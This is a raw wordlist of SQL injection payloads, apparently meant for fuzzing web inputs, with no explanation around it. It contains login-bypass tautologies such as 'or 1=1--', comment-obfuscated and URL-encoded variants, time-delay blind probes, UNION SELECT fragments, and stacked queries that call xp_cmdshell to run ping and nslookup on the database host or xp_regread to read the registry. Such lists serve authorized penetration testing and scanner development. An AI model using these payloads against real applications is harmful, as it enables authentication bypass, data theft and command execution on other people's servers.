'
' -- 
OR 1=1--' OR 1=1--" OR 1=1--\' OR 1=1--\" OR 1=1--
OR/**/1=1--'/**/OR/**/1=1--"/**/OR/**/1=1--\'/**/OR/**/1=1--\"/**/OR/**/1=1--
a' or 1=1 -- 
"a"" or 1=1 -- "
 or a = a
a' or 'a' = 'a
a' waitfor delay '0:0:10'-- 
1 waitfor delay '0:0:10'-- 
'/**/--/**/
a'/**/or/**/1=1/**/--/**/
"a""/**/or/**/1=1/**/--/**/"
/**/or/**/a/**/=/**/a
a'/**/or/**/'a'/**/=/**/'a
a'/**/waitfor/**/delay/**/'0:0:10'--/**/
1/**/waitfor/**/delay/**/'0:0:10'--/**/
a'
%
?
` or 1=1 -- 
x' AND userid IS NULL; -- 
x' AND email IS NULL; -- 
x' AND members.email IS NULL; -- 
x' OR full_name LIKE '%Bob%
23 OR 1=1
'; exec master..xp_cmdshell 'ping 172.10.1.255' -- 
'
'%20or%20''='
'%20or%20'x'='x
%20or%20x=x
')%20or%20('x'='x
0 or 1=1
' or 0=0 -- 
' or 1=0 -- 
' or 1=1
' or 1=0
" or 0=0 -- 
" or 1=0 -- 
or 0=0 -- 
' or 0=0 #
 or 0=0 #"
or 0=0 #
' or 1=1-- 
" or 1=1-- 
' or '1'='1'-- 
' or 1 -- '
1 or 1=1
or 1=1-- 
or%201=1
or%201=1 -- 
' or 1=1 or ''='
 or 1=1 or ""=
0/**/or/**/1=1
'/**/or/**/0=0/**/--/**/
'/**/or/**/1=1
"/**/or/**/0=0/**/--/**/
or/**/0=0/**/--/**/
'/**/or/**/0=0/**/#
/**/or/**/0=0/**/#"
or/**/0=0/**/#
'/**/or/**/1=1--/**/
"/**/or/**/1=1--/**/
'/**/or/**/'1'='1'--/**/
'/**/or/**/1/**/--/**/'
1/**/or/**/1=1
or/**/1=1--/**/
or%201=1
or%201=1/**/--/**/
'/**/or/**/1=1/**/or/**/''='
/**/or/**/1=1/**/or/**/""=
4-3
2-1
1-0
1
-1
-0
' or a=a-- 
 or a=a
') or ('a'='a
) or (a=a
hi or a=a
hi or 1=1 -- "
hi' or 1=1 -- 
hi' or 'a'='a
hi') or ('a'='a
"hi"") or (""a""=""a"
'hi' or 'x'='x';
'/**/or/**/a=a--/**/
/**/or/**/a=a
')/**/or/**/('a'='a
)/**/or/**/(a=a
hi/**/or/**/a=a
hi/**/or/**/1=1/**/--/**/"
hi'/**/or/**/1=1/**/--/**/
hi'/**/or/**/'a'='a
hi')/**/or/**/('a'='a
"hi"")/**/or/**/(""a""=""a"
'hi'/**/or/**/'x'='x';
,@variable
PRINT
PRINT @@variable
select
insert
procedure
limit
order by
asc
desc
distinct
having
replace
like
handler
bfilename
' or username like '%
' or uname like '%
' or userid like '%
' or uid like '%
' or user like '%
exec xp
exec sp
'; exec master..xp_cmdshell
'; exec xp_regread
t'exec master..xp_cmdshell 'nslookup www.google.com' -- 
--sp_password
\x27UNION SELECT
' UNION SELECT
'%20or%201=1
%27%20or%201=1
|
(
%28
)
%29
&
%26
!
%21
' or 1=1 or ''='
' or ''='
x' or 1=1 or 'x'='y
/
//
//*
*/*
